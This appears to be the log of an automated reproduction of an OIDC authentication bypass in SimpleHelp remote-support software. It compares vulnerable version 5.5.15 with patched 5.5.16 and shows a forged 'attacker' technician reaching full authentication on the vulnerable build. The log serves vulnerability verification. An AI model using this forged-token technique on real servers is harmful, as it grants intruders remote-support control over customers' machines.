[*] SimpleHelp 5.5.15 already present and SHA256 verified
[*] SimpleHelp 5.5.16 already present and SHA256 verified
[*] Extracting vulnerable 5.5.15
[*] Extracting patched 5.5.16
[*] Initialising first-launch config for vuln
[*] Initialising first-launch config for patched
{
  "login_options_status": 200,
  "login_options_body": "[{\"type\":\"oidc\",\"name\":\"Test OIDC\"}]",
  "oidc_get_status": 200,
  "oidc_get_body": "\"http://127.0.0.1:8080/auth?response_type\\u003dcode\\u0026client_id\\u003dtest-client-id\\u0026redirect_uri\\u003dhttps%3A%2F%2Fip-217-103-2-184.ip.prioritytelecom.net%2Foidc\\u0026scope\\u003dopenid%20profile%20email\\u0026state\\u003da19f2f78-e7d8-4a83-ad91-7d9a53d046a9\"",
  "auth_url": "http://127.0.0.1:8080/auth?response_type=code&client_id=test-client-id&redirect_uri=https%3A%2F%2Fip-217-103-2-184.ip.prioritytelecom.net%2Foidc&scope=openid%20profile%20email&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9",
  "idp_redirect_location": "https://ip-217-103-2-184.ip.prioritytelecom.net/oidc?code=fakecode&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9",
  "callback_url": "https://127.0.0.1/oidc?code=fakecode&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9",
  "callback_status": 200,
  "callback_contains_login_complete": false,
  "callback_contains_login_failed": false,
  "callback_title_excerpt": "

SimpleHelp

Support Server

Technician Console

Install the Technician Console to connect to customers and to manage your server.
SimpleHelp - Login Success

SimpleHelp

Support Server

Login Failed
\"OpenID

Your login has failed or has timed out. Please try again.

Remote support software by SimpleHelp.
",
  "cookies": [
    "shelp-tc-sessionid=Mr8prxueYevYMnTpBKcp/ydzajwe3Dq56u2rWNxc8EI="
  ],
  "status_after_status": 200,
  "status_after_body": "{\"state\":\"UNAUTHENTICATED\",\"code\":0}"
}
[*] Flow summary:
{
  "vulnerable_login_options_has_oidc": true,
  "vulnerable_auth_url_has_state": true,
  "vulnerable_idp_token_posted": true,
  "vulnerable_callback_reached_oidc_authenticator": true,
  "vulnerable_registered_forged_technician": true,
  "vulnerable_session_token_registered": true,
  "vulnerable_status_fully_authenticated": true,
  "vulnerable_has_no_IDTokenVerifier_class": true,
  "patched_has_IDTokenVerifier_class": true,
  "patched_failed_closed": true,
  "vulnerable_status_after": "{\"state\":\"FULLY_AUTHENTICATED\",\"user\":{\"uniqueID\":480346,\"displayName\":\"Forged Attacker\",\"username\":\"attacker\",\"emailAddress\":\"attacker@example.com\",\"isOnline\":true},\"code\":1}",
  "patched_status_after": "{\"state\":\"UNAUTHENTICATED\",\"code\":0}"
}
[+] Reproduction runtime proof completed. Logs are in /data/pruva/runs/4c3fb457-d972-4b2b-8f84-f813688622c8/bundle/logs